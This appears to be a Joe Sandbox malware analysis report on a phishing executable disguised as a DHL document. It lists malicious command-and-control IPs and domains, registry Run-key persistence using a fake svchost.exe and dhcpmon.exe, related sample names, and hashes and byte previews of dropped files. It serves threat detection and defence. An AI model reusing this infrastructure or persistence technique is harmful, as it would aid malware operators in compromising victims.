https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s615/0_Salah-Goal-vs-Leeds.jpg	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.369051616.00000000070FB000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-02	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpg	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.369051616.00000000070FB000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-19946	svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.hulu.com/ca-privacy-rights	svchost.exe, 00000023.00000003.461376428.000001EB103BA000.00000004.00000001.sdmp	false		high
https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836	svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dev.ditu.live.com/mapcontrol/logging.ashx	svchost.exe, 00000011.00000003.311219184.000002886D661000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.191.231.252	unknown	Netherlands		64236	UNREAL-SERVERSUS	true
172.67.150.212	myliverpoolnews.cf	United States		13335	CLOUDFLARENETUS	true

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	383099
Start date:	07.04.2021
Start time:	08:40:36
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 20s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	DHL_document11022020680908911.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.evad.winEXE@43/34@8/4
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe, wuapihost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 93.184.221.240, 13.88.21.125, 52.147.198.201, 40.88.32.150, 52.255.188.83, 95.100.54.203, 13.64.90.137, 20.82.210.154, 104.43.139.144, 104.43.193.48, 23.10.249.43, 23.10.249.26, 20.54.26.129, 52.155.217.156 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, wu.azureedge.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing network information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/383099/sample/DHL_document11022020680908911.exe

Simulations

Behavior and APIs

Time	Type	Description
08:41:26	API Interceptor	639x Sleep call for process: DHL_document11022020680908911.exe modified
08:41:39	API Interceptor	10x Sleep call for process: svchost.exe modified
08:41:50	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce YjhEmlfdsnrvbvoUtFds C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe
08:41:59	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
08:42:07	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce YjhEmlfdsnrvbvoUtFds C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe
08:42:29	API Interceptor	138x Sleep call for process: powershell.exe modified
08:43:00	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.191.231.252	PAYMENT RECEIPT.exe	Get hash	malicious	Browse
	Purchase Order-877.exe	Get hash	malicious	Browse
	DHLdocument11022020680908911.doc.exe	Get hash	malicious	Browse
	Purchase Order-877.exe	Get hash	malicious	Browse
	Purchase Order-877.exe	Get hash	malicious	Browse
	Confirmation Draft Shipping Documents.exe	Get hash	malicious	Browse
172.67.150.212	BL8846545545363.exe	Get hash	malicious	Browse	myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-B7B18D8B53846C51E3D2182818196100.html
172.67.150.212	BL84995005038483.exe	Get hash	malicious	Browse	myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-994F3BB06F4A7FE8F60B83F74A076F10.html

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
myliverpoolnews.cf	BL8846545545363.exe	Get hash	malicious	Browse	172.67.150.212
	VMtEguRH.exe	Get hash	malicious	Browse	104.21.56.119
	BL84995005038483.exe	Get hash	malicious	Browse	172.67.150.212

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
UNREAL-SERVERSUS	Arifashayan_2020_06_04_RFQ.exe	Get hash	malicious	Browse	185.215.151.28
	POVdRnvBDNdZ0tZ.exe	Get hash	malicious	Browse	185.215.151.28
	PAYMENT RECEIPT.exe	Get hash	malicious	Browse	185.191.231.252
	Purchase Order-877.exe	Get hash	malicious	Browse	185.191.231.252
	DHLdocument11022020680908911.doc.exe	Get hash	malicious	Browse	185.191.231.252
	Purchase Order-877.exe	Get hash	malicious	Browse	185.191.231.252
	klz4gyUavm3BYrK.exe	Get hash	malicious	Browse	185.215.151.28
	Purchase Order-877.exe	Get hash	malicious	Browse	185.191.231.252
	Confirmation Draft Shipping Documents.exe	Get hash	malicious	Browse	185.191.231.252
	oga.exe	Get hash	malicious	Browse	193.39.184.4
	OUOTATION.doc	Get hash	malicious	Browse	193.39.184.4
	DOC10909266NR5272RBL2021DHL66178278_LAX27782.exe	Get hash	malicious	Browse	185.202.175.208
	Remittance Advice.xls	Get hash	malicious	Browse	162.251.123.194
	BL draft pdf.exe	Get hash	malicious	Browse	185.215.150.204
	PO for 410303-1.exe	Get hash	malicious	Browse	185.215.150.204
	Company profile and Purchase Order.exe	Get hash	malicious	Browse	185.215.150.204
	3swub1YK2w.exe	Get hash	malicious	Browse	185.215.150.204
	PROVA DE PAGAMENTO.xls	Get hash	malicious	Browse	185.215.150.204
	attached Products with photos.xls	Get hash	malicious	Browse	185.215.150.204
	Inquiry PR11020204168.xlsx	Get hash	malicious	Browse	142.147.98.180
CLOUDFLARENETUS	DHL_document11022020680908911.doc.exe	Get hash	malicious	Browse	104.21.15.11
	Confirmation_(#1422) DEKRA order,pdf.exe	Get hash	malicious	Browse	104.21.19.200
	BL8846545545363.exe	Get hash	malicious	Browse	172.67.150.212
	ATTACHED.exe	Get hash	malicious	Browse	172.67.188.154
	Urgent RFQ_AP65425652_040621,pdf.exe	Get hash	malicious	Browse	104.21.19.200
	Order.exe	Get hash	malicious	Browse	23.227.38.74
	VMtEguRH.exe	Get hash	malicious	Browse	172.67.150.212
	OVERVIEW .pdf.exe	Get hash	malicious	Browse	104.21.19.200
	PURCHASE ORDER - XIFFA55.PDF.exe	Get hash	malicious	Browse	172.67.188.154
	Purchase Order_NO189.exe	Get hash	malicious	Browse	104.21.23.61
	Specification 01012_pdf.exe	Get hash	malicious	Browse	172.67.181.195
	doc20192910887888001990.exe	Get hash	malicious	Browse	104.21.19.200
	BL84995005038483.exe	Get hash	malicious	Browse	172.67.150.212
	INVOICE_.EXE	Get hash	malicious	Browse	162.159.134.233
	ATTACHED.exe	Get hash	malicious	Browse	104.21.19.200
	PO91361.exe	Get hash	malicious	Browse	23.227.38.74
	DHL Shipping Documents.exe	Get hash	malicious	Browse	104.21.1.113
	SALM0BRU.exe	Get hash	malicious	Browse	172.67.188.154
	DropDll.dll	Get hash	malicious	Browse	104.20.185.68
	Purchase Order.8000.scan.pdf...exe	Get hash	malicious	Browse	172.67.188.154

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Confirmation_(#1422) DEKRA order,pdf.exe	Get hash	malicious	Browse	172.67.150.212
	BL8846545545363.exe	Get hash	malicious	Browse	172.67.150.212
	ATTACHED.exe	Get hash	malicious	Browse	172.67.150.212
	Urgent RFQ_AP65425652_040621,pdf.exe	Get hash	malicious	Browse	172.67.150.212
	OVERVIEW .pdf.exe	Get hash	malicious	Browse	172.67.150.212
	PURCHASE ORDER - XIFFA55.PDF.exe	Get hash	malicious	Browse	172.67.150.212
	doc20192910887888001990.exe	Get hash	malicious	Browse	172.67.150.212
	BL84995005038483.exe	Get hash	malicious	Browse	172.67.150.212
	ATTACHED.exe	Get hash	malicious	Browse	172.67.150.212
	ej 9999999.exe	Get hash	malicious	Browse	172.67.150.212
	DHL FINAL REMINDER PDF.exe	Get hash	malicious	Browse	172.67.150.212
	WSU0LJSL.exe	Get hash	malicious	Browse	172.67.150.212
	RFQ 100400806 SUPPLY.exe	Get hash	malicious	Browse	172.67.150.212
	P#108871980.pdf.exe	Get hash	malicious	Browse	172.67.150.212
	AD1-2001028L.exe	Get hash	malicious	Browse	172.67.150.212
	swift copy.exe	Get hash	malicious	Browse	172.67.150.212
	PO XIFFA55,pdf.exe	Get hash	malicious	Browse	172.67.150.212
	AD1-2001028L (2).exe	Get hash	malicious	Browse	172.67.150.212
	PO XIFFA55,pdf.exe	Get hash	malicious	Browse	172.67.150.212
	FK58.vbs	Get hash	malicious	Browse	172.67.150.212

Dropped Files

No context

Created / dropped Files

C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Download File
Process:	C:\Users\user\Desktop\DHL_document11022020680908911.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	83728
Entropy (8bit):	5.714633843934463
Encrypted:	false
SSDEEP:	768:DVo9K0V0z/hpL8dKKuzVczbeso66z0Rb6eQxl8+to23I9aFhVkSdM2VhY:DOKU0Dhp7HI
MD5:	DC8E7CDE980F05501758F8CE3048682E
SHA1:	FCA9C2A66CFDDFE6A8677E1568EA32AD18DDA600
SHA-256:	E3B80DB58C1FA79C3780E68CF7D3EA987FB2615A68077BA3B110CFD3A7CF4DE6
SHA-512:	5CD3210D136DCC6854781911960D7ABEB6AFCC2B22D78AC37665D68C93D7141335EBE1865DB42098D7A17AB7B2C035D77B9621E814C0E0D1843B11B82D7C82E2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 15%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$............."...0..&..........NE... ...`....@.. ...............................x....@..................................D..S....`...............2............................................................... ............... ..H............text...T%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............0..............@..B................0E......H.......(&...............................................................>..r...p.o.....".(.....Vs....(....t.........".(.....R.(.......s....}....6.(....o8........0...........~.....+....0............r...po....t"....+.....0..9........s.....+...-....o....o.....o....,...o........o....o.........0...........(....o.....+.+.../....*.0...........r...p.+...1......s......%r...pr...p~....(?...o....%r...pr...p~....(?...o......}....r...pr...p~....(?...r._.p~....(....s........(...

C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\DHL_document11022020680908911.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\ProgramData\Microsoft\Network\Downloader\edb.log Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5981930978381301
Encrypted:	false
SSDEEP:	6:bpk1GaD0JOCEfMuaaD0JOCEfMKQmDDAl/gz2cE0fMbhEZolrRSQ2hyYIIT:b+GaD0JcaaD0JwQQDAg/0bjSQJ
MD5:	B9516DCD65986FD716C9904E664FB410
SHA1:	4E6BC9112FD5F89B3AD6EAA5C04DD653ACB7DD2B
SHA-256:	9FD81E2D5B760DA5573A0A04AEA754DC55EBD29E1B582F226ED022C933FF7120
SHA-512:	56896CC49F624770D01EF835615308E2142BE2AD639E1D170F93A003C77AC24C286AFB2F23D3E324489D92B359721E10CF76A8BD6F9921735EAEEC5F7AAF6679
Malicious:	false
Preview:	....E..h..(.....()...y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................()...y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x39ee6f85, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.09689799132070583
Encrypted:	false
SSDEEP:	6:6Kvzwl/+UINlk1RIE11Y8TRX73XKWSUKUKvzwl/+UINlk1RIE11Y8TRX73XKWSUK:hv0+UI3sO4bluKKTv0+UI3sO4bluKK
MD5:	58FB2E16C5EC6B78A4CB2238EA512F51
SHA1:	37779B624684B166504EE968763CF60C5E325929
SHA-256:	0BB401C365BCF527416E0EFF722496D6E6F40EDA5A10C3FF6BFD9F83B3A00BDA
SHA-512:	25790CA5CA14CBE6AD9D293C9A65F8A54CEB47318BCB07F229731623CDB13AFE1754482A9BEE015E8EBF06B3B2990973C6AA309745F05DF13F693FF11311ABD0
Malicious:	false
Preview:	9.o.... ................e.f.3...w........................&..........w..()...y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w..........................................................................................................................................................................................................................................()...y......................()...y..........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.1115988791644607
Encrypted:	false
SSDEEP:	3:2vlX7EvNGcmM/iSXl/bJdAtiKWxNGcmXlYll:2vlXinq8t4bWSI
MD5:	518893C80EEC9095DD0C88EE8170F01C
SHA1:	E7BA9F1A33069563B0F38CBAFB3E7834691230F9
SHA-256:	7295353F0915C083BE02F1769FC66D484A0638D5CE921F064A34FAAA52652E75
SHA-512:	0F6C00F6ACE33A8B41976D9E3DC65EC86434A66F707576646B8EA3855D853AEE3B81C91B3F6C892351D0B6C5D3AD437CE2031F3A66CCBC57BC7642818E02A22F
Malicious:	false
Preview:	........................................3...w..()...y.......w...............w.......w....:O.....w......................()...y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Users\user\Desktop\DHL_document11022020680908911.exe
File Type:	Microsoft Cabinet archive data, 58596 bytes, 1 file
Category:	dropped
Size (bytes):	58596
Entropy (8bit):	7.995478615012125
Encrypted:	true
SSDEEP:	1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
MD5:	61A03D15CF62612F50B74867090DBE79
SHA1:	15228F34067B4B107E917BEBAF17CC7C3C1280A8
SHA-256:	F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
SHA-512:	5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
Malicious:	false
Preview:	MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............\|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>..V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..\|0.+?.`-../.xvy..e......w.+^...w\|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g\|.z..+.D8.m..F .h............ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Users\user\Desktop\DHL_document11022020680908911.exe
File Type:	data
Category:	dropped
Size (bytes):	326
Entropy (8bit):	3.1208005371411627
Encrypted:	false
SSDEEP:	6:kK1hskwTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:9hskwTJrkPlE99SNxAhUe0ht
MD5:	0C13270D07859DEEDFB414845757B920
SHA1:	7784C10AA859DC1A4DD9C3C3756E73F97DEFAE70
SHA-256:	1CADA997942FF3A0D8947C2D6E3F741656E5DE2226A8C30C4C53F5BB3B4FDF04
SHA-512:	D332E4B2D9182B2896A4E7294C5A2F04499AADB3BF6DE7F6D6DDEC6A4A2DBAEC03EF3C947E6672BE343F4E5CB16739A14D6298B0BFEA194F774C3F788F05BB27
Malicious:	false
Preview:	p...... ..........\|x.+..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...

C:\Users\user\AppData\Local\??????????????????_Inc\DHL_document1102202068090_Url_gs1bizmdyzt0sie1s5ccihjs02mocitg\1.435.261.664\blkrfgqc.newcfg Download File
Process:	C:\Users\user\Desktop\DHL_document11022020680908911.exe
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1959637
Entropy (8bit):	3.024710733298822
Encrypted:	false
SSDEEP:	12288:eh3YluYJg4X88s105ngVZG4acXv6CDWNBxcd/Nz23hihgn/SuUwp3yTP+rEkl90h:Z2RQA0qP
MD5:	A84ECC506A9390BEB66DF84241FBB862
SHA1:	4394C2254F57E785D871E527C4ECEB8341EF4E91
SHA-256:	E272A55E005AA0C9E062DF24D387F2EC0EE99C23AAC582B23E37F9E0EF43787F
SHA-512:	F9EB3465DBEE849A7099E801A058E3973C20A5088E7A95AB4B753AC0463CFED9ABECBB46C6E3D345F03BE1EC86DFB0D13E90E89B0838B6B878FFD256CD2F4A28
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" >.. <section name="........................._x4A01__x49DB__x49D8__x49D0__x49EB__x49EC__x4A03__x49FE__x49E1__x49FD__x49E2__x49EB__x49F9__x49E3__x49F7__x4A02__x49D7__x49D0__x4A00__x49EF__x49D1__x49D6__x49DA__x49CF__x49E1__x49D7__x49D3__x49DD__x49F7__x49CC__x49CD__x49DF__x49FB__x49FE__x49D9__x49F3__x49F8__x49E4__x49ED__x49DA__x49CB__x49DC__x49D5__x49F1_" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />.. </sectionGroup>.. </configSections>.. <userSettings>.. <.........................

C:\Users\user\AppData\Local\??????????????????_Inc\dhcpmon.exe_Url_51mf4zlqimpycewjb4ac5u5zedoi4jyw\1.435.261.664\p2sezwes.newcfg Download File
Process:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1959637
Entropy (8bit):	3.024710733298822
Encrypted:	false
SSDEEP:	12288:eh3YluYJg4X88s105ngVZG4acXv6CDWNBxcd/Nz23hihgn/SuUwp3yTP+rEkl90h:Z2RQA0qP
MD5:	A84ECC506A9390BEB66DF84241FBB862
SHA1:	4394C2254F57E785D871E527C4ECEB8341EF4E91
SHA-256:	E272A55E005AA0C9E062DF24D387F2EC0EE99C23AAC582B23E37F9E0EF43787F
SHA-512:	F9EB3465DBEE849A7099E801A058E3973C20A5088E7A95AB4B753AC0463CFED9ABECBB46C6E3D345F03BE1EC86DFB0D13E90E89B0838B6B878FFD256CD2F4A28
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" >.. <section name="........................._x4A01__x49DB__x49D8__x49D0__x49EB__x49EC__x4A03__x49FE__x49E1__x49FD__x49E2__x49EB__x49F9__x49E3__x49F7__x4A02__x49D7__x49D0__x4A00__x49EF__x49D1__x49D6__x49DA__x49CF__x49E1__x49D7__x49D3__x49DD__x49F7__x49CC__x49CD__x49DF__x49FB__x49FE__x49D9__x49F3__x49F8__x49E4__x49ED__x49DA__x49CB__x49DC__x49D5__x49F1_" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />.. </sectionGroup>.. </configSections>.. <userSettings>.. <.........................

C:\Users\user\AppData\Local\??????????????????_Inc\svchost.exe_Url_te4mlpoqf2bcwq3h5bsdnyytvfurus1x\1.435.261.664\w1ari1ci.newcfg Download File
Process:	C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1959637
Entropy (8bit):	3.024710733298822
Encrypted:	false
SSDEEP:	12288:eh3YluYJg4X88s105ngVZG4acXv6CDWNBxcd/Nz23hihgn/SuUwp3yTP+rEkl90h:Z2RQA0qP
MD5:	A84ECC506A9390BEB66DF84241FBB862
SHA1:	4394C2254F57E785D871E527C4ECEB8341EF4E91
SHA-256:	E272A55E005AA0C9E062DF24D387F2EC0EE99C23AAC582B23E37F9E0EF43787F
SHA-512:	F9EB3465DBEE849A7099E801A058E3973C20A5088E7A95AB4B753AC0463CFED9ABECBB46C6E3D345F03BE1EC86DFB0D13E90E89B0838B6B878FFD256CD2F4A28
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" >.. <section name="........................._x4A01__x49DB__x49D8__x49D0__x49EB__x49EC__x4A03__x49FE__x49E1__x49FD__x49E2__x49EB__x49F9__x49E3__x49F7__x4A02__x49D7__x49D0__x4A00__x49EF__x49D1__x49D6__x49DA__x49CF__x49E1__x49D7__x49D3__x49DD__x49F7__x49CC__x49CD__x49DF__x49FB__x49FE__x49D9__x49F3__x49F8__x49E4__x49ED__x49DA__x49CB__x49DC__x49D5__x49F1_" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />.. </sectionGroup>.. </configSections>.. <userSettings>.. <.........................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL_document11022020680908911.exe.log Download File
Process:	C:\Users\user\Desktop\DHL_document11022020680908911.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7K84jE4Kx1qE4KE4j:MxHKXwYHKhQnoPtHoxHhAHKzvKvjHKxx
MD5:	2FD7E71CA8D743CC2422614966BEA9C8
SHA1:	5971512AFA67509A8923EED3F589A434F8C3A2DE
SHA-256:	C23314B1FDAEC738BA4D65BF52B1E8EA5C6D25D371BA82442698D8076CC63BD0
SHA-512:	DF7A07178A8F888ADA3C6D4C6742621330AB4A12F33286FB3145A4259CAA156B91D9EC115E8B88ED5BEC204176409EAE18DDCD1988FE22153693F2A852A7A392
Malicious:	true
